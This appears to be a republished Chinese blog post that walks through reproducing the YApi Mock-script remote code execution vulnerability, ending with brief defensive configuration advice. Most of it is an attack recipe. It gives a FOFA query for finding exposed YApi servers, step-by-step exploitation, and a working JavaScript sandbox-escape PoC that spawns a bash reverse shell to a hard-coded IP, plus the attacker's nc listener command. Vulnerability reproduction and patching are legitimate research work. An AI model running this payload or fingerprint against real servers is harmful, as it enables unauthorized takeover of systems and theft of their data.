[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

一、漏洞描述

API接口管理平台是国内某旅行网站的大前端技术中心开源项目,使用mock数据/脚本作为中间交互层,为前端后台开发与测试人员提供更优雅的接口管理服务,该系统被国内较多知名互联网企业所采用。 YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务,导致攻击者注册用户后,即可通过 Mock功能远程执行任意代码。

二、fofa指纹

app="YAPI"

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

三、利用过程

1、打开登录页面,注册账号
2、新增项目,新增接口
3、打开高级Mock
4、开启脚本
5、写入poc
6、访问接口
7、getshell

四、环境搭建

1、Docker部署

https://github.com/Ryan-Miao/docker-yapi

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

可参考连接:

五、代码执行

1、打开登录页面,注册账号

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

随便填写

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

; 2、添加项目、添加接口

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

3、打开高级Mock

4、开启脚本

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

; 5、写入poc

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

6、访问接口

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

; 7、命令执行成功

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

六、Getshell(nc和nc的反向连接)

上面我们成功的执行了ls
我们把ls换成反弹shell的命令,就可以成功getshell了
Nc学习可参考链接:

1、攻击机监听

反弹shell我们就用nc就好了,linux系统是自带nc的
攻击机执行nc -lvv 44444进行监听

nc -lvvp 44444

有师傅可能看到我这里执行的是nc -lvv 44444
可能由于我用的vps是centos8的缘故,可能命令不一样。

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

2、靶机连接

新建项目,新建接口

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

; 打开高级mack,开启脚本,写入poc

就是之前代码执行的步骤。只需要把POC换一下就可以

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

POC

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("bash -i>&/dev/tcp/124.70.29.182/44444 0>&1)").toString()

访问接口

直接访问这个链接

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解
[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

; 攻击机getshell

Shell就反弹回来了

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

我们同样执行一下ls

[ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

七、漏洞防御:

1、关闭YApi用户注册功能;修改完成后,重启YApi服务

在"config.json"添加"closeRegister:true"配置项:
 {
"port": "*****",
"closeRegister":true
}

2、暂时关闭mock功能(需要修改YApi代码)

在”config.json”中添加”mock: false”;
“exts/yapi-plugin-andvanced-mock/server.js”中找到

if (caseData&&caseData.case_enable{...}

在其上方添加

if(!yapi.WEBCONFIG.mock) {return false;}

3、白名单限制;

安全组配置白名单访问,或者使用NGINX进行代理,限制白名单IP访问;

4、删除恶意

检查用户列表,删除恶意不明用户;并删除恶意不明用户创建的接口及mock脚本。

Original: https://blog.csdn.net/qq_51577576/article/details/126127223
Author: _PowerShell
Title: [ 漏洞复现篇 ] yapi 代码执行 getshell 漏洞复现详解

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/560327/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球